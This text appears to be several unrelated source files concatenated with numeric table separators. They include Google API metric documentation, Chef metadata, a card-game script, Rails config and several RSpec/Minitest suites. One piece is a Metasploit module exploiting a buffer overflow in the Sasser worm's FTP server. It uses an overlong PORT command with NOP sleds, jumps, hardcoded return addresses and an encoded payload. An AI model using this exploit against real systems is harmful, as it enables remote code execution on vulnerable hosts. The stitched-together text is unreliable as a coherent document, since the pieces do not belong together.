# Some combinations of `metric_kind` and `value_type` might not be supported.
# @!attribute [rw] unit
# @return [String]
# The units in which the metric value is reported. It is only applicable
# if the `value_type` is `INT64`, `DOUBLE`, or `DISTRIBUTION`. The `unit`
# defines the representation of the stored metric values.
#
# Different systems may scale the values to be more easily displayed (so a
# value of `0.02KBy` _might_ be displayed as `20By`, and a value of
# `3523KBy` _might_ be displayed as `3.5MBy`). However, if the `unit` is
# `KBy`, then the value of the metric is always in thousands of bytes, no
    # matter how it may be displayed.
#
# If you want a custom metric to record the exact number of CPU-seconds used
# by a job, you can create an `INT64 CUMULATIVE` metric whose `unit` is
# `s{CPU}` (or equivalently `1s{CPU}` or just `s`). If the job uses 12,005
# CPU-seconds, then the value is written as `12005`.
#
    # Alternatively, if you want a custom metric to record data in a more
# granular way, you can create a `DOUBLE CUMULATIVE` metric whose `unit` is
# `ks{CPU}`, and then write the value `12.005` (which is `12005/1000`),
# or use `Kis{CPU}` and write `11.723` (which is `12005/1024`).
#
# The supported units are a subset of [The Unified Code for Units of
# Measure](http://unitsofmeasure.org/ucum.html) standard:
#
# **Basic units (UNIT)**
#
# * `bit` bit
# * `By` byte
# * `s` second
# * `min` minute
# * `h` hour
# * `d` day
#
# **Prefixes (PREFIX)**
#
# * `k` kilo (10^3)
# * `M` mega (10^6)
# * `G` giga (10^9)
# * `T` tera (10^12)
# * `P` peta (10^15)
# * `E` exa (10^18)
# * `Z` zetta (10^21)
# * `Y` yotta (10^24)
#
# * `m` milli (10^-3)
# * `u` micro (10^-6)
# * `n` nano (10^-9)
# * `p` pico (10^-12)
# * `f` femto (10^-15)
# * `a` atto (10^-18)
# * `z` zepto (10^-21)
# * `y` yocto (10^-24)
#
# * `Ki` kibi (2^10)
# * `Mi` mebi (2^20)
# * `Gi` gibi (2^30)
# * `Ti` tebi (2^40)
# * `Pi` pebi (2^50)
#
# **Grammar**
#
# The grammar also includes these connectors:
#
# * `/` division or ratio (as an infix operator). For examples,
# `kBy/{email}` or `MiBy/10ms` (although you should almost never
# have `/s` in a metric `unit`; rates should always be computed at
# query time from the underlying cumulative or delta value).
# * `.` multiplication or composition (as an infix operator). For
# examples, `GBy.d` or `k{watt}.h`.
#
# The grammar for a unit is as follows:
#
# Expression = Component { "." Component } { "/" Component } ;
#
# Component = ( [ PREFIX ] UNIT | "%" ) [ Annotation ]
# | Annotation
# | "1"
# ;
#
# Annotation = "{" NAME "}" ;
#
# Notes:
#
# * `Annotation` is just a comment if it follows a `UNIT`. If the annotation
# is used alone, then the unit is equivalent to `1`. For examples,
# `{request}/s == 1/s`, `By{transmitted}/s == By/s`.
# * `NAME` is a sequence of non-blank printable ASCII characters not
# containing `{` or `}`.
# * `1` represents a unitary [dimensionless
# unit](https://en.wikipedia.org/wiki/Dimensionless_quantity) of 1, such
# as in `1/s`. It is typically used when none of the basic units are
# appropriate. For example, "new users per day" can be represented as
# `1/d` or `{new-users}/d` (and a metric value `5` would mean "5 new
    # users"). Alternatively, "thousands of page views per day" would be
# represented as `1000/d` or `k1/d` or `k{page_views}/d` (and a metric
# value of `5.3` would mean "5300 page views per day").
# * `%` represents dimensionless value of 1/100, and annotates values giving
# a percentage (so the metric values are typically in the range of 0..100,
# and a metric value `3` means "3 percent").
# * `10^2.%` indicates a metric contains a ratio, typically in the range
# 0..1, that will be multiplied by 100 and displayed as a percentage
# (so a metric value `0.03` means "3 percent").
# @!attribute [rw] description
# @return [String]
# A detailed description of the metric, which can be used in documentation.
# @!attribute [rw] display_name
# @return [String]
# A concise name for the metric, which can be displayed in user interfaces.
# Use sentence case without an ending period, for example "Request count".
# This field is optional but it is recommended to be set for any metrics
# associated with user-visible concepts, such as Quota.
# @!attribute [rw] metadata
# @return [Google::Api::MetricDescriptor::MetricDescriptorMetadata]
# Optional. Metadata which can be used to guide usage of the metric.
# @!attribute [rw] launch_stage
# @return [Google::Api::LaunchStage]
# Optional. The launch stage of the metric definition.
class MetricDescriptor
# Additional annotations that can be used to guide the usage of a metric.
# @!attribute [rw] launch_stage
# @return [Google::Api::LaunchStage]
# Deprecated. Please use the MetricDescriptor.launch_stage instead.
# The launch stage of the metric definition.
# @!attribute [rw] sample_period
# @return [Google::Protobuf::Duration]
# The sampling period of metric data points. For metrics which are written
# periodically, consecutive data points are stored at this time interval,
# excluding data loss due to errors. Metrics with a higher granularity have
# a smaller sampling period.
# @!attribute [rw] ingest_delay
# @return [Google::Protobuf::Duration]
# The delay of data points caused by ingestion. Data points older than this
# age are guaranteed to be ingested and available to be read, excluding
# data loss due to errors.
class MetricDescriptorMetadata; end
# The kind of measurement. It describes how the data is reported.
module MetricKind
# Do not use this default value.
METRIC_KIND_UNSPECIFIED = 0
# An instantaneous measurement of a value.
GAUGE = 1
# The change in a value during a time interval.
DELTA = 2
# A value accumulated over a time interval. Cumulative
# measurements in a time series should have the same start time
# and increasing end times, until an event resets the cumulative
# value to zero and sets a new start time for the following
# points.
CUMULATIVE = 3
end
# The value type of a metric.
module ValueType
# Do not use this default value.
VALUE_TYPE_UNSPECIFIED = 0
# The value is a boolean.
# This value type can be used only if the metric kind is `GAUGE`.
BOOL = 1
# The value is a signed 64-bit integer.
INT64 = 2
# The value is a double precision floating point number.
DOUBLE = 3
# The value is a text string.
# This value type can be used only if the metric kind is `GAUGE`.
STRING = 4
# The value is a {Google::Api::Distribution `Distribution`}.
DISTRIBUTION = 5
# The value is money.
MONEY = 6
end
end
# A specific metric, identified by specifying values for all of the
# labels of a {Google::Api::MetricDescriptor `MetricDescriptor`}.
# @!attribute [rw] type
# @return [String]
# An existing metric type, see {Google::Api::MetricDescriptor}.
# For example, `custom.googleapis.com/invoice/paid/amount`.
# @!attribute [rw] labels
# @return [Hash{String => String}]
# The set of label values that uniquely identify this metric. All
# labels listed in the `MetricDescriptor` must be assigned values.
class Metric; end
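    # Illustrative descriptor (hash shape inferred from the attributes documented
    # above, not copied from a live API response):
    #
    #   {
    #     type: "custom.googleapis.com/store/inventory_size",
    #     metric_kind: :GAUGE,
    #     value_type: :INT64,
    #     unit: "{items}",   # bare annotation, equivalent to "1" per the grammar
    #     display_name: "Inventory size"
    #   }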
end
end | 44.730612 | 85 | 0.598777 |
18baf9b50f98897aea092e7d3e3a0f8ee1ff9639 | 484 | name 'generated_cookbook'
maintainer 'Copyright Holder'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs / configures generated_cookbook'
long_description ::File.read(File.expand_path('../README.md', __FILE__))
version '0.1.0'
chef_version '>= 12'
# issues_url 'https://github.com/<insert_org_here>/generated_cookbook/issues'
# source_url 'https://github.com/<insert_org_here>/generated_cookbook'
| 44 | 83 | 0.698347 |
616676080a6a24fecbbe98998865be12b300e3bb | 303 | require 'euchre'
# choose trump
puts %w{Diamonds Clubs Spades Hearts}[rand(4)]
ed = EuchreDeck.new
ed.shuffle
5.times{ puts ed.deal }
# And the sort program as:
require 'euchre'
eh = EuchreHand.new
eh.trump = gets.strip
while card = gets
eh.add_card( card.strip )
end
puts eh.trump
puts eh.hand
| 12.625 | 46 | 0.719472 |
011f25115462bc48608b3e0a028d1543879316a8 | 372 | # -*- encoding: ascii-8bit -*-
require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../shared/cover_and_include', __FILE__)
require File.expand_path('../shared/cover', __FILE__)
ruby_version_is "1.8.8" do
describe "Range#cover?" do
it_behaves_like :range_cover_and_include, :cover?
it_behaves_like :range_cover, :cover?
end
end | 33.818182 | 65 | 0.731183 |
4a5556ab0b4f240e4d4bb4fe0473172cba0723f0 | 2,161 | # frozen_string_literal: true
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
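  # For reference: `rails dev:cache` simply creates or deletes tmp/caching-dev.txt,
  # the file checked above, so the toggle takes effect on the next boot.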
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
config.action_mailer.default_url_options = { host: 'configcube.pdev', port: 80 }
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 34.301587 | 85 | 0.761222 |
7993e31d4c42a3ab2a5e7502f7f2f1eeb71d58ff | 1,867 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow',
'Description' => %q{
This module exploits the FTP server component of the Sasser worm.
By sending an overly long PORT command the stack can be overwritten.
},
'Author' => [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '6197'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 480,
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r ws2help.dll
[ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r
],
'DisclosureDate' => 'May 10 2004',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(5554),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')
sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)
send_cmd( ['PORT', sploit] , false)
handler
disconnect
end
end
| 27.455882 | 101 | 0.534012 |
bb58ebea673f7fb0b97a021f55758b59cc4c2a96 | 3,815 | RSpec.describe EventSourcery::EventProcessing::ErrorHandlers::ExponentialBackoffRetry do
subject(:error_handler) do
described_class.new(
processor_name: processor_name,
)
end
let(:processor_name) { 'processor_name' }
let(:on_event_processor_error) { spy }
let(:logger) { spy(Logger) }
before do
@sleep_intervals = []
allow(EventSourcery.config).to receive(:on_event_processor_error).and_return(on_event_processor_error)
allow(EventSourcery).to receive(:logger).and_return(logger)
allow(logger).to receive(:error)
allow(error_handler).to receive(:sleep) { |interval| @sleep_intervals << interval }
end
describe '#with_error_handling' do
let(:event_processor) { double :event_processor }
let(:cause) { double(to_s: 'OriginalError', backtrace: ['back', 'trace']) }
let(:event) { double(uuid: SecureRandom.uuid) }
let(:number_of_errors_to_raise) { 3 }
subject(:with_error_handling) do
@count = 0
error_handler.with_error_handling do
@count +=1
raise error if @count <= number_of_errors_to_raise
end
end
context 'when the raised error is StandardError' do
before do
allow(error).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error) { StandardError.new('Some error') }
it 'logs the errors' do
expect(logger).to have_received(:error).thrice
end
it 'calls on_event_processor_error with error and processor name' do
expect(on_event_processor_error).to have_received(:call).thrice.with(error, processor_name)
end
it 'sleeps the process at default interval' do
expect(@sleep_intervals).to eq [1, 1, 1]
end
end
context 'when the raised errors are EventProcessingError for the same event' do
before do
allow(error).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error) { EventSourcery::EventProcessingError.new(event: event, processor: event_processor) }
it 'logs the original error' do
expect(logger).to have_received(:error).thrice.with("Processor #{processor_name} died with OriginalError.\nback\ntrace")
end
it 'calls on_event_processor_error with error and processor name' do
expect(on_event_processor_error).to have_received(:call).thrice.with(cause, processor_name)
end
it 'sleeps the process at exponential increasing intervals' do
expect(@sleep_intervals).to eq [1, 2, 4]
end
context 'when lots of errors are raised for the same event' do
let(:number_of_errors_to_raise) { 10 }
it 'sleeps the process at exponential increasing intervals' do
expect(@sleep_intervals).to eq [1, 2, 4, 8, 16, 32, 64, 64, 64, 64]
end
end
end
context 'when the raised errors are EventProcessingError for the different events' do
before do
allow(error_for_event).to receive(:cause).and_return(cause)
allow(error_for_another_event).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error_for_event) { EventSourcery::EventProcessingError.new(event: event, processor: event_processor) }
let(:another_event) { double(uuid: SecureRandom.uuid) }
let(:error_for_another_event) { EventSourcery::EventProcessingError.new(event: another_event, processor: event_processor) }
subject(:with_error_handling) do
@count = 0
error_handler.with_error_handling do
@count +=1
raise error_for_event if @count <= 3
raise error_for_another_event if @count <= 5
end
end
it 'resets retry interval when event uuid changes' do
expect(@sleep_intervals).to eq [1, 2, 4, 1, 2]
end
end
end
end
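# Minimal sketch (assumption, not the gem's actual implementation) of the retry
# interval these examples assert: double the delay for each consecutive failure
# of the same event, cap it at 64 seconds, and reset when the event changes.
#
#   def next_interval(retries)
#     [2**retries, 64].min
#   end
#
#   (0..9).map { |n| next_interval(n) } # => [1, 2, 4, 8, 16, 32, 64, 64, 64, 64]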
| 35.990566 | 129 | 0.683617 |
08569a130778ad94c2eb25c0db9c0f8c34411c9c | 619 | require "serverspec"
require "docker"
describe "Dockerfile" do
before(:all) do
image = Docker::Image.build_from_dir('/docker-file/.')
set :os, family: :debian
set :backend, :docker
set :docker_image, image.id
end
describe file('/usr/share/jenkins/ref/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/init.groovy.d/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/adop_scripts/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/adop_scripts/') do
it { should be_owned_by 'root' }
end
end
| 19.967742 | 59 | 0.678514 |
5dcf86028dbeefef55b483ea20e8819df168cbc9 | 780 | Pod::Spec.new do |s|
s.name = "ReYunTracking"
s.version = "1.3.3"
s.summary = "ReYun Tracking SDK"
s.homepage = "https://github.com/ReYunTracking/Tracking"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "feiyang" => "[email protected]" }
s.platform = :ios
s.ios.deployment_target = "8.0"
s.source = { :git => "https://github.com/ReYunTracking/Tracking.git", :tag => s.version }
s.source_files = 'Tracking/*.h'
s.preserve_paths = 'Tracking/*.a'
s.xcconfig = { 'LIBRARY_SEARCH_PATHS' => '"$(PODS_ROOT)/ReYunTracking/Tracking/**"' }
s.frameworks = 'SystemConfiguration','AdSupport','CoreTelephony','Security','CoreMotion'
s.libraries = 'sqlite3','ReYunTracking'
end
| 26.896552 | 98 | 0.598718 |
e8afc7fa386442e44261860c069b327f0493e60d | 23,426 | # frozen_string_literal: true
require_relative '../test_helper'
SingleCov.covered! uncovered: 4
describe Stage do
subject { stages(:test_staging) }
let(:stage) { subject }
it "#unique_name" do
assert_equal "Foo / Staging", stage.unique_name
end
describe "validations" do
it "is valid" do
assert_valid stage
end
it "is valid with 1 email" do
stage.notify_email_address = '[email protected]'
assert_valid stage
end
it "is invalid with email that contains spaces" do
stage.notify_email_address = 'fo [email protected]'
refute_valid stage
end
it "is valid with trailing semicolon email" do
stage.notify_email_address = '[email protected]; '
assert_valid stage
end
it "is invalid with weird emails" do
stage.notify_email_address = 'sdfsfdfsd'
refute_valid stage
end
it "is invalid with valid followed by invalid email" do
stage.notify_email_address = 'foo@bar;sfdsdf;'
refute_valid stage
end
it "is invalid with invalid followed by valid email" do
stage.notify_email_address = 'sfdsdf;foo@bar'
refute_valid stage
end
it "is valid with multiple valid emails" do
stage.notify_email_address = 'foo@bar;bar@foo'
assert_valid stage
end
end
describe ".where_reference_being_deployed" do
it "returns stages where the reference is currently being deployed" do
project = projects(:test)
stage = stages(:test_staging)
author = users(:deployer)
job = project.jobs.create!(user: author, commit: "a", command: "yes", status: "running")
stage.deploys.create!(reference: "xyz", job: job, project: project)
assert_equal [stage], Stage.where_reference_being_deployed("xyz")
end
end
describe ".deployed_on_release" do
it "returns stages with deploy_on_release" do
stage.update_column(:deploy_on_release, true)
Stage.deployed_on_release.must_equal [stage]
end
end
describe '.reset_order' do
let(:project) { projects(:test) }
let(:stage1) { Stage.create!(project: project, name: 'stage1', order: 1) }
let(:stage2) { Stage.create!(project: project, name: 'stage2', order: 2) }
let(:stage3) { Stage.create!(project: project, name: 'stage3', order: 3) }
it 'updates the order on stages' do
Stage.reset_order [stage3.id, stage2.id, stage1.id]
stage1.reload.order.must_equal 2
stage2.reload.order.must_equal 1
stage3.reload.order.must_equal 0
end
it 'succeeds even if a stages points to a deleted stage' do
stage3.soft_delete!(validate: false)
stage1.update! next_stage_ids: [stage3.id]
Stage.reset_order [stage2.id, stage1.id]
stage1.reload.order.must_equal 1
stage2.reload.order.must_equal 0
end
end
describe '#last_deploy' do
let(:project) { projects(:test) }
let(:stage) { stages(:test_staging) }
it 'caches nil' do
stage
ActiveRecord::Relation.any_instance.expects(:first).returns nil
stage.last_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
stage.last_deploy.must_be_nil
end
it 'returns the last deploy for the stage' do
job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'succeeded')
stage.deploys.create!(reference: 'master', job: job, project: project)
job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'failed')
deploy = stage.deploys.create!(reference: 'master', job: job, project: project)
assert_equal deploy, stage.last_deploy
end
end
describe '#last_successful_deploy' do
let(:project) { projects(:test) }
it 'caches nil' do
subject
ActiveRecord::Relation.any_instance.expects(:first).returns nil
stage.last_successful_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
stage.last_successful_deploy.must_be_nil
end
it 'returns the last successful deploy for the stage' do
successful_job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'succeeded')
stage.deploys.create!(reference: 'master', job: successful_job, project: project)
project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'failed')
deploy = stage.deploys.create!(reference: 'master', job: successful_job, project: project)
assert_equal deploy, stage.last_successful_deploy
end
end
describe "#create_deploy" do
let(:user) { users(:deployer) }
it "creates a new deploy" do
deploy = subject.create_deploy(user, reference: "foo")
deploy.reference.must_equal "foo"
deploy.release.must_equal true
end
it "creates a new job" do
deploy = subject.create_deploy(user, reference: "foo")
deploy.job.commit.must_equal "foo"
deploy.job.user.must_equal user
end
it "creates neither job nor deploy if one fails to save" do
assert_no_difference "Deploy.count + Job.count" do
subject.create_deploy(user, reference: "")
end
end
it "creates a no-release deploy when stage was configured to not deploy code" do
subject.no_code_deployed = true
deploy = subject.create_deploy(user, reference: "foo")
deploy.release.must_equal false
end
end
describe "#active_deploy" do
it "is nil when not deploying" do
subject.active_deploy.must_be_nil
end
it 'caches nil' do
subject
ActiveRecord::Relation.any_instance.expects(:first).returns nil
subject.active_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
subject.active_deploy.must_be_nil
end
it "is there when deploying" do
subject.deploys.first.job.update_column(:status, 'running')
subject.active_deploy.must_equal subject.deploys.first
end
it "is there when waiting for buddy" do
subject.deploys.first.job.update_column(:status, 'pending')
subject.active_deploy.must_equal subject.deploys.first
end
end
describe "#notify_email_addresses" do
it "returns email addresses separated by a semicolon" do
stage = Stage.new(notify_email_address: "[email protected];[email protected] ; [email protected]; ")
stage.notify_email_addresses.must_equal ["[email protected]", "[email protected]", "[email protected]"]
end
it "ignores whitespace" do
stage = Stage.new(notify_email_address: " ")
stage.notify_email_addresses.must_equal []
end
end
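  # A sketch (assumption, not the actual model code) of a #notify_email_addresses
  # implementation consistent with the two examples above:
  #
  #   def notify_email_addresses
  #     notify_email_address.to_s.split(";").map(&:strip).reject(&:blank?)
  #   end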
describe "#next_stage" do
let(:project) { Project.new }
let(:stage1) { Stage.new(project: project) }
let(:stage2) { Stage.new(project: project) }
before do
project.stages = [stage1, stage2]
end
it "returns the next stage of the project" do
stage1.next_stage.must_equal stage2
end
it "returns nil if the current stage is the last stage" do
stage2.next_stage.must_be_nil
end
end
describe "#automated_failure_emails" do
let(:user) { users(:super_admin) }
let(:deploy) do
deploy = subject.create_deploy(user, reference: "commita")
deploy.job.failed!
deploy
end
let(:previous_deploy) { deploys(:succeeded_test) }
let(:emails) { subject.automated_failure_emails(deploy) }
let(:simple_response) { Hashie::Mash.new(commits: [{commit: {author: {email: "[email protected]"}}}]) }
before do
user.update_attribute(:integration, true)
subject.update_column(:static_emails_on_automated_deploy_failure, "[email protected]")
subject.update_column(:email_committers_on_automated_deploy_failure, true)
deploys(:failed_staging_test).destroy # this fixture confuses these tests.
end
it "includes static emails and committer emails" do
GITHUB.expects(:compare).with(anything, previous_deploy.job.commit, "commita").returns simple_response
emails.must_equal ["[email protected]", "[email protected]"]
end
it "is empty when deploy was a success" do
deploy.job.succeeded!
emails.must_be_nil
end
it "is empty when last deploy was also a failure" do
previous_deploy.job.failed!
emails.must_be_nil
end
it "is empty when user was human" do
user.update_attribute(:integration, false)
emails.must_be_nil
end
it "includes committers when there is no previous deploy" do
previous_deploy.delete
emails.must_equal ["[email protected]"]
end
    it "does not include committers if the author did not have an email" do
GITHUB.expects(:compare).returns Hashie::Mash.new(commits: [{commit: {author: {}}}])
emails.must_equal ["[email protected]"]
end
    it "does not include committers when email_committers_on_automated_deploy_failure? is off" do
subject.update_column(:email_committers_on_automated_deploy_failure, false)
emails.must_equal ["[email protected]"]
end
    it "does not include static emails when static is empty" do
subject.update_column(:static_emails_on_automated_deploy_failure, "")
GITHUB.expects(:compare).returns simple_response
emails.must_equal ["[email protected]"]
end
end
describe ".build_clone" do
def clone_diff
stage_attributes = stage.attributes
cloned.attributes.map { |k, v| [k, stage_attributes[k], v] unless stage_attributes[k] == v }.compact
end
let(:stage) { stages(:test_staging) }
let(:cloned) { Stage.build_clone(stage) }
it "returns an unsaved copy of the given stage" do
clone_diff.must_equal(
[
["id", stage.id, nil],
["is_template", true, false],
["template_stage_id", nil, stage.id]
]
)
end
it "copies associations" do
stage.flowdock_flows = [FlowdockFlow.new(name: "test", token: "abcxyz", stage_id: subject.id)]
cloned.flowdock_flows.size.must_equal 1
end
it "does not copy deploy pipeline since that would result in duplicate deploys" do
stage.next_stage_ids = [stages(:test_production).id]
cloned.next_stage_ids.must_equal []
end
end
describe '#production?' do
let(:stage) { stages(:test_production) }
before { DeployGroup.stubs(enabled?: true) }
it 'is true for stage with production deploy_group' do
stage.update!(production: false)
stage.production?.must_equal true
end
it 'is false for stage with non-production deploy_group' do
stage = stages(:test_staging)
stage.production?.must_equal false
end
it 'false for stage with no deploy_group' do
stage.update!(production: false)
stage.deploy_groups = []
stage.production?.must_equal false
end
    it 'falls back to the production field when deploy groups were enabled without selecting deploy groups' do
stage.deploy_groups = []
stage.production = true
stage.production?.must_equal true
stage.production = false
stage.production?.must_equal false
end
    it 'falls back to the production field when deploy groups are disabled' do
DeployGroup.stubs(enabled?: false)
stage.update!(production: true)
stage.production?.must_equal true
stage.update!(production: false)
stage.production?.must_equal false
end
end
describe "#deploy_requires_approval?" do
before do
BuddyCheck.stubs(enabled?: true)
stage.production = true
end
it "requires approval with buddy-check + deploying + production" do
assert stage.deploy_requires_approval?
end
it "does not require approval when buddy check is disabled" do
BuddyCheck.unstub(:enabled?)
refute stage.deploy_requires_approval?
end
it "does not require approval when not in production" do
stage.production = false
refute stage.deploy_requires_approval?
end
it "does not require approval when not deploying code" do
stage.no_code_deployed = true
refute stage.deploy_requires_approval?
end
end
describe '#deploy_group_names' do
let(:stage) { stages(:test_production) }
it 'returns array when DeployGroup enabled' do
DeployGroup.stubs(enabled?: true)
stage.deploy_group_names.must_equal ['Pod1', 'Pod2']
end
it 'returns empty array when DeployGroup disabled' do
DeployGroup.stubs(enabled?: false)
stage.deploy_group_names.must_equal []
end
end
describe '#save' do
it 'touches the stage and project when only changing deploy_groups for cache invalidation' do
stage.update_column(:updated_at, 1.minutes.ago)
stage.project.update_column(:updated_at, 1.minutes.ago)
stage.deploy_groups << deploy_groups(:pod1)
stage.save
stage.updated_at.must_be :>, 2.seconds.ago
stage.project.updated_at.must_be :>, 2.seconds.ago
end
end
describe "#ensure_ordering" do
it "puts new stages to the back" do
new = stage.project.stages.create! name: 'Newish'
new.order.must_equal 3
end
end
describe "#destroy" do
    it "soft deletes all its StageCommands" do
Stage.with_deleted do
assert_difference "StageCommand.count", -1 do
stage.soft_delete!(validate: false)
end
assert_difference "StageCommand.count", +1 do
stage.soft_undelete!
end
end
end
end
describe '#script' do
it 'joins all commands based on position' do
command = Command.create!(command: 'test')
stage.command_ids = [command.id, commands(:echo).id]
stage.save!
stage.reload
stage.script.must_equal "test\n#{commands(:echo).command}"
end
it 'is empty without commands' do
stage.command_ids = []
stage.script.must_equal ""
end
end
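  # A sketch (assumption, not the actual model code) of a #script that joins the
  # stage's commands by position, as the examples above expect:
  #
  #   def script
  #     stage_commands.sort_by(&:position).map { |sc| sc.command.command }.join("\n")
  #   end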
describe '#command_ids=' do
let!(:sample_commands) do
['foo', 'bar', 'baz'].map { |c| Command.create!(command: c) }
end
before do
StageCommand.delete_all
stage.command_ids = sample_commands.map(&:id)
stage.script.must_equal "foo\nbar\nbaz"
end
it "can reorder" do
stage.command_ids = sample_commands.map(&:id).reverse
stage.save!
stage.script.must_equal "baz\nbar\nfoo"
stage.reload
stage.script.must_equal "baz\nbar\nfoo"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [2, 1, 0]
end
it "ignores blanks" do
stage.command_ids = ['', nil, ' '] + sample_commands.map(&:id).reverse
stage.save!
stage.script.must_equal "baz\nbar\nfoo"
stage.reload
stage.script.must_equal "baz\nbar\nfoo"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [2, 1, 0]
end
it "can add new stage commands" do
stage.command_ids = ([commands(:echo)] + sample_commands).map(&:id)
stage.save!
stage.script.must_equal "echo hello\nfoo\nbar\nbaz"
stage.reload
stage.script.must_equal "echo hello\nfoo\nbar\nbaz"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [1, 2, 3, 0] # kept the old and added one new
end
it 'can add new commands' do
StageCommand.delete_all
stage.command_ids = ['echo newcommand']
stage.save!
stage.script.must_equal 'echo newcommand'
end
end
describe "auditing" do
it "tracks important changes" do
stage.update_attributes!(name: "Foo")
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "name" => ["Staging", "Foo"]
end
it "ignores unimportant changes" do
stage.update_attributes(order: 5, updated_at: 1.second.from_now)
stage.audits.size.must_equal 0
end
it "tracks selecting an existing command" do
old = stage.command_ids
new = old + [commands(:global).id]
stage.update_attributes!(command_ids: new)
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "script" => ["echo hello", "echo hello\necho global"]
end
it "does not track when commands do not change" do
stage.update_attributes!(command_ids: stage.command_ids.map(&:to_s))
stage.audits.size.must_equal 0
end
it "tracks command removal" do
stage.update_attributes!(command_ids: [])
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "script" => ["echo hello", ""]
end
it "tracks command_ids reorder" do
stage.send(:stage_commands).create!(command: commands(:global), position: 1)
stage.update_attributes!(command_ids: stage.command_ids.reverse)
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal(
"script" => ["echo hello\necho global", "echo global\necho hello"]
)
end
it "does not trigger multiple times when destroying" do
stage.destroy!
stage.audits.size.must_equal 1
end
it "does not trigger multiple times when creating" do
stage = Stage.create!(name: 'Foobar', project: projects(:test), command_ids: Command.pluck(:id))
stage.audits.size.must_equal 1
end
end
describe "#destroy_deploy_groups_stages" do
it 'deletes deploy_groups_stages on destroy' do
assert_difference 'DeployGroupsStage.count', -1 do
stage.destroy!
end
end
end
describe "#influencing_stage_ids" do
let(:other) { stages(:test_production) }
it "finds self when there are none" do
stage.influencing_stage_ids.must_equal [stage.id]
end
describe "with other stage" do
before { DeployGroupsStage.create!(stage: other, deploy_group: stage.deploy_groups.first) }
it "finds other stages that go to the same deploy groups" do
stage.influencing_stage_ids.sort.must_equal [stage.id, other.id].sort
end
it "does not find stages in other projects" do
other.update_column(:project_id, 123)
stage.influencing_stage_ids.sort.must_equal [stage.id]
end
it "does not list stages that prepare the deploy to avoid false-positives" do
other.update_column(:no_code_deployed, true)
stage.influencing_stage_ids.sort.must_equal [stage.id]
end
end
end
describe "template linking" do
describe "with no clones" do
it "has no parent" do
assert_nil subject.template_stage
end
it "has no clones" do
assert_empty subject.clones
end
end
describe "with one clone" do
before do
@clone = Stage.build_clone(subject)
@clone.name = "foo1"
@clone.save!
@clone.reload
end
it "has one parent" do
assert_equal subject, @clone.template_stage
end
it "has one clone" do
assert_equal [@clone], subject.clones
end
end
describe "with many clones" do
before do
@clone1 = Stage.build_clone(subject)
@clone1.name = "foo1"
@clone1.save!
@clone1.reload
@clone2 = Stage.build_clone(subject)
@clone2.name = "foo2"
@clone2.save!
@clone2.reload
@clones = [@clone1, @clone2]
end
it "has one parent" do
@clones.each do |c|
assert_equal subject, c.template_stage
end
end
it "has multiple clones" do
assert_equal @clones, subject.clones
end
end
end
